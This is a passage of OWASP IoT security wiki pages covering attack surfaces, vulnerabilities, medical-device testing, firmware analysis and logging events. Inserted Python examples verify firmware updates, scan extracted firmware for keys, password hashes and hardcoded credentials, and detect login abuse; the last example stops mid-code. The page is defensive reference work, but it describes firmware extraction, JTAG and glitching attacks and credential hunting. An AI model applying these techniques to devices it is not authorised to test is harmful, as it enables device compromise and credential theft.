* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
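The Update Mechanism and Device Firmware rows above (updates not signed, update verification, update authentication, firmware downgrade possibility) all come down to one check the device must make before it writes anything to flash. The following is an added example, not code from the OWASP project: a verifier for a constructed update container format that authenticates the whole container before trusting any field in it, and then enforces anti-rollback. HMAC-SHA256 with a hypothetical vendor key stands in for an asymmetric signature so that the example runs on the Python standard library; on a real device keep only a public key and verify an Ed25519 or RSA signature with it, because a shared secret baked into firmware is itself a hardcoded key.<br />

```python
"""Device-side verification of a firmware update container.

Constructed container layout (integers big-endian), not a real vendor format:
  magic    4 bytes   b"FWUP"
  version  4 bytes   monotonically increasing firmware version
  length   4 bytes   payload length
  payload  N bytes   firmware image
  tag     32 bytes   HMAC-SHA256 over magic | version | length | payload
"""
import hashlib
import hmac
import struct
from typing import Tuple

MAGIC = b"FWUP"
HEADER = struct.Struct(">4sII")   # magic, version, payload length
TAG_LEN = 32

# Hypothetical vendor key. HMAC stands in for an asymmetric signature so that
# the example runs on the standard library; a real device should hold only a
# public key and verify an Ed25519 or RSA signature with it.
VENDOR_KEY = b"example-vendor-update-key"


class UpdateRejected(Exception):
    pass


def build_update(version: int, payload: bytes, key: bytes = VENDOR_KEY) -> bytes:
    """Vendor side: wrap a payload in the container and authenticate it."""
    body = HEADER.pack(MAGIC, version, len(payload)) + payload
    return body + hmac.new(key, body, hashlib.sha256).digest()


def verify_update(blob: bytes, installed_version: int, key: bytes = VENDOR_KEY) -> Tuple[int, bytes]:
    """Device side: return (version, payload) or raise UpdateRejected.

    Authentication comes first so that no field of an unverified container,
    not even its version number, influences any decision.
    """
    if len(blob) < HEADER.size + TAG_LEN:
        raise UpdateRejected("truncated container")
    body, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):      # constant-time comparison
        raise UpdateRejected("authentication failed")
    magic, version, length = HEADER.unpack_from(body)
    if magic != MAGIC:
        raise UpdateRejected("bad magic")
    payload = body[HEADER.size:]
    if len(payload) != length:
        raise UpdateRejected("length mismatch")
    # Anti-rollback: only a strictly newer image may be installed, so a
    # validly signed but older image cannot be replayed to reintroduce a bug.
    if version <= installed_version:
        raise UpdateRejected(f"downgrade or replay: {version} <= {installed_version}")
    return version, payload


def try_apply(blob: bytes, installed_version: int) -> str:
    """Status string for the outcomes a tester wants to see."""
    try:
        version, _ = verify_update(blob, installed_version)
        return f"accepted v{version}"
    except UpdateRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    good = build_update(12, b"firmware image v12")
    print(try_apply(good, installed_version=11))            # accepted v12
    tampered = bytearray(good)                               # writable update location:
    tampered[HEADER.size] ^= 0xFF                            # attacker flips a payload byte
    print(try_apply(bytes(tampered), installed_version=11))  # rejected: authentication failed
    old = build_update(9, b"firmware image v9")              # genuine but old image
    print(try_apply(old, installed_version=11))              # rejected: downgrade or replay: 9 <= 11
```

Running it shows the three outcomes a tester checks for: a correctly authenticated newer image is accepted, a byte flipped by someone with write access to the update location fails authentication, and an older image that was legitimately signed is refused by the version check. Authenticating before parsing is deliberate; a version field read from an unverified container is attacker-controlled.<br />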
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is misconfigured or not kept up to date, e.g. still accepting SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies it, or the entire device, to legitimate users<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, the execution of the firmware on the device can be modified to bypass almost all software-based security controls.<br />
* Side channel attacks can also alter the execution flow or be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can often obtain full console access to the device<br />
* Common countermeasures include custom bootloaders that prevent entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
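Once firmware has been obtained by any of the routes in the "Firmware and storage extraction" row, the next step is to look through the unpacked filesystem for the material that row and the "Insecure 3rd party components" row describe. The scanner below is an added example, not an OWASP tool: it runs over a filesystem constructed inline as a dictionary (in practice, the directory left behind by a tool such as binwalk -e), and flags PEM private keys, empty or crackable password entries in shadow/passwd files, credential literals in scripts and configs, and component version banners older than an assumed baseline. The regular expressions and the baseline versions are illustrative choices for this example, not a standard.<br />

```python
"""Scan an unpacked firmware filesystem for shipped secrets and outdated components."""
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]   # (path, category, detail)

# Constructed stand-in for the directory tree left by unpacking a firmware
# image (e.g. with binwalk -e); every file below is made up for the example.
SAMPLE_FS: Dict[str, bytes] = {
    "/etc/shadow": (b"root:$1$saltsalt$Q2v9xqzkf0vWUFh1nXyKn0:17000:0:99999:7:::\n"
                    b"admin::17000:0:99999:7:::\n"),
    "/etc/ssl/private/device.key": (b"-----BEGIN RSA PRIVATE KEY-----\n"
                                    b"MIIEpAIBAAKCAQEAexampleexampleexample\n"
                                    b"-----END RSA PRIVATE KEY-----\n"),
    "/etc/init.d/cloud_agent": (b"#!/bin/sh\nMQTT_PASSWORD=\"s3cret-device-pw\"\n"
                                b"exec cloud_agent --user device --password \"$MQTT_PASSWORD\"\n"),
    "/bin/busybox": b"\x7fELF\x01\x01\x01 BusyBox v1.22.1 (2014-01-20 10:33:52 UTC) multi-call binary",
    "/usr/lib/libssl.so.1.0.0": b"\x7fELF\x01\x01\x01 OpenSSL 1.0.1e 11 Feb 2013",
    "/www/index.html": b"<html>nothing interesting</html>",
}

PRIVATE_KEY_RE = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")
SHADOW_RE = re.compile(rb"^([^:\n]+):([^:\n]*):", re.M)          # user:hash:
CRED_RE = re.compile(rb"(?i)(pass(?:word|wd)?)\s*[=:]\s*[\"']?([^\s\"']+)")
VERSION_RE = re.compile(rb"(BusyBox|OpenSSL|Dropbear|lighttpd)[ v]+(\d+\.\d+(?:\.\d+)?[a-z]?)")

# Assumed assessment baseline: oldest version accepted per component.
# Illustrative numbers, not a standard; adjust to the engagement.
MIN_VERSION = {b"BusyBox": (1, 30, 0), b"OpenSSL": (1, 1, 1)}


def version_tuple(ver: bytes) -> Tuple[int, ...]:
    """b'1.0.1e' -> (1, 0, 1); letter suffixes are ignored for the comparison."""
    return tuple(int(x) for x in re.findall(rb"\d+", ver))


def scan_file(path: str, data: bytes) -> List[Finding]:
    findings: List[Finding] = []
    if PRIVATE_KEY_RE.search(data):
        findings.append((path, "private-key", "PEM private key shipped in firmware"))
    if path.endswith(("/shadow", "/passwd")):
        for user, pw_hash in SHADOW_RE.findall(data):
            if pw_hash == b"":
                findings.append((path, "empty-password", user.decode()))
            elif pw_hash.startswith(b"$"):
                findings.append((path, "password-hash",
                                 f"{user.decode()} ({pw_hash[:3].decode()} crypt, crackable offline)"))
    else:
        for name, value in CRED_RE.findall(data):
            findings.append((path, "hardcoded-credential",
                             f"{name.decode()}={value.decode(errors='replace')}"))
    for component, ver in VERSION_RE.findall(data):
        baseline = MIN_VERSION.get(component)
        if baseline and version_tuple(ver) < baseline:
            findings.append((path, "outdated-component",
                             f"{component.decode()} {ver.decode()} < {'.'.join(map(str, baseline))}"))
    return findings


def scan(fs: Dict[str, bytes]) -> List[Finding]:
    """Scan every file; paths are sorted so the report is stable."""
    findings: List[Finding] = []
    for path in sorted(fs):
        findings.extend(scan_file(path, fs[path]))
    return findings


if __name__ == "__main__":
    for path, category, detail in scan(SAMPLE_FS):
        print(f"{category:20} {path:30} {detail}")
```

To walk a real extraction, replace SAMPLE_FS with a dictionary built from os.walk over the unpacked root. The path-based rule for shadow/passwd files is worth keeping: a hashed password found anywhere else is normally an application secret and deserves a finding of its own.<br />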
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key (shared across devices)<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Physical tampering<br />
* Physical damage<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! Details<br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy-to-guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard-code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
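As an added example (not part of the OWASP project page), the following Python detector runs over a few constructed device log lines and raises four of the events from the table above: Multiple Failed Passwords, High Rate of Login Attempts, Device Accessed Using Default Administrative Credentials, and Traffic Seen from Unenrolled System. The key=value log format, the field names (including a cred=default marker the device is assumed to emit), the thresholds and the enrolled-device inventory are assumptions made for this illustration.

```python
"""Detection logic for a subset of the recommended IoT logging events.

Added example, not code from the OWASP IoT project. Log format, field names,
thresholds and the enrolled-device inventory are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines in an assumed "<timestamp> key=value ..." format.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z src=10.0.0.5 user=admin action=login result=fail
2024-01-01T10:00:01Z src=10.0.0.5 user=admin action=login result=fail
2024-01-01T10:00:02Z src=10.0.0.5 user=admin action=login result=fail
2024-01-01T10:00:03Z src=10.0.0.5 user=admin action=login result=fail
2024-01-01T10:00:04Z src=10.0.0.5 user=admin action=login result=fail
2024-01-01T10:00:05Z src=10.0.0.5 user=admin action=login result=success cred=default
2024-01-01T10:01:00Z src=10.0.0.9 device=sensor-77 action=report
2024-01-01T10:02:00Z src=10.0.0.7 device=sensor-12 action=report
"""

ENROLLED_DEVICES = {"sensor-12"}     # assumed ecosystem inventory
FAILED_PASSWORD_THRESHOLD = 3         # failed logins per user before an event
RATE_THRESHOLD = 5                    # login attempts per source within RATE_WINDOW
RATE_WINDOW = timedelta(seconds=10)


def parse_line(line):
    """Split one log line into a dict; the first token is the UTC timestamp."""
    ts, *pairs = line.split()
    record = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
    for item in pairs:
        key, _, value = item.partition("=")
        record[key] = value
    return record


def detect_events(log_text, enrolled=ENROLLED_DEVICES):
    """Return (category, event, subject) tuples for the events found in log_text.

    Each threshold-based event is raised once, when the threshold is first hit.
    """
    events = []
    failed_by_user = defaultdict(int)       # Multiple Failed Passwords
    logins_by_src = defaultdict(list)       # High Rate of Login Attempts (sliding window)

    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)

        if rec.get("action") == "login":
            window = logins_by_src[rec["src"]]
            window.append(rec["ts"])
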